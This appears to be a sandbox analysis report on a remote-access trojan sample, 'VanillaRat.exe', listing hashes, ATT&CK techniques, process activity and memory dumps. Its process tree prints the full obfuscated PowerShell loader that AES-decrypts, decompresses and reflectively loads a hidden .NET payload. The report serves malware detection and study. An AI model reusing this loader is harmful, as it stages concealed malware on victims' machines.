6d886767f487cd0bc1ee29c899540e2ccfe6f1d3253ea629acd8d397a0a84faa

General

Target

Release/VanillaRat.exe
Size

1.7MB
MD5

59fea74c326c7e496617bb45bdfbcc00
SHA1

7c0dd54592857eed1cb068e24315b2bbe7511b76
SHA256

9b6dcbe8df1be5241a40987a416e896737a7442db492e9df8413277835fb766d
SHA512

443005543a476b0c3ef4744ba0b7075185cf0ae80783c06f98ee2845872c54ad2ee6d69810acaed692720b5ad19129935b751e45ac8725b050ccca5b94ecc6ba
SSDEEP

24576:Lz2qwZHZd2PjnRh3Xz2DrtasSA7ZUNnbkAqE6joUZ57W:f2qw+nYVZY6jog

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2840 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

Handler.bat.exe

pid process

2856 Handler.bat.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2884 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeHandler.bat.exe

pid process

2840 powershell.exe
2840 powershell.exe
2840 powershell.exe
2856 Handler.bat.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeHandler.bat.exe

description pid process

Token: SeDebugPrivilege 2840 powershell.exe
Token: SeDebugPrivilege 2856 Handler.bat.exe

pid	process
2840	powershell.exe

pid	process
2856	Handler.bat.exe

pid	process
2884	cmd.exe

pid	process
2840	powershell.exe
2840	powershell.exe
2840	powershell.exe
2856	Handler.bat.exe

description	pid	process
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	2856	Handler.bat.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

VanillaRat.exepowershell.execmd.exe

description	pid	process	target process
PID 2432 wrote to memory of 2840	2432	VanillaRat.exe	powershell.exe
PID 2432 wrote to memory of 2840	2432	VanillaRat.exe	powershell.exe
PID 2432 wrote to memory of 2840	2432	VanillaRat.exe	powershell.exe
PID 2840 wrote to memory of 2884	2840	powershell.exe	cmd.exe
PID 2840 wrote to memory of 2884	2840	powershell.exe	cmd.exe
PID 2840 wrote to memory of 2884	2840	powershell.exe	cmd.exe
PID 2884 wrote to memory of 2856	2884	cmd.exe	Handler.bat.exe
PID 2884 wrote to memory of 2856	2884	cmd.exe	Handler.bat.exe
PID 2884 wrote to memory of 2856	2884	cmd.exe	Handler.bat.exe

C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\Release\VanillaRat.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -command "& {Start-Process -FilePath 'Handlers\Handler.bat' -WindowStyle Hidden -Wait}
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat" "
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
      "Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2432-16-0x000007FEF56C3000-0x000007FEF56C4000-memory.dmp

Filesize
4KB

Download
memory/2432-3-0x000000001BEF0000-0x000000001BFD0000-memory.dmp

Filesize
896KB

Download
memory/2432-1-0x0000000000A20000-0x0000000000BDE000-memory.dmp

Filesize
1.7MB

Download
memory/2432-4-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp

Filesize
9.9MB

Download
memory/2432-17-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp

Filesize
9.9MB

Download
memory/2432-0-0x000007FEF56C3000-0x000007FEF56C4000-memory.dmp

Filesize
4KB

Download
memory/2432-2-0x000007FEF56C0000-0x000007FEF60AC000-memory.dmp

Filesize
9.9MB

Download
memory/2840-9-0x000007FEECC8E000-0x000007FEECC8F000-memory.dmp

Filesize
4KB

Download
memory/2840-15-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-11-0x0000000001F60000-0x0000000001F68000-memory.dmp

Filesize
32KB

Download
memory/2840-12-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-10-0x000000001B350000-0x000000001B632000-memory.dmp

Filesize
2.9MB

Download
memory/2840-14-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-18-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-19-0x000007FEECC8E000-0x000007FEECC8F000-memory.dmp

Filesize
4KB

Download
memory/2840-13-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

Filesize
9.6MB

Download
memory/2840-25-0x000007FEEC9D0000-0x000007FEED36D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing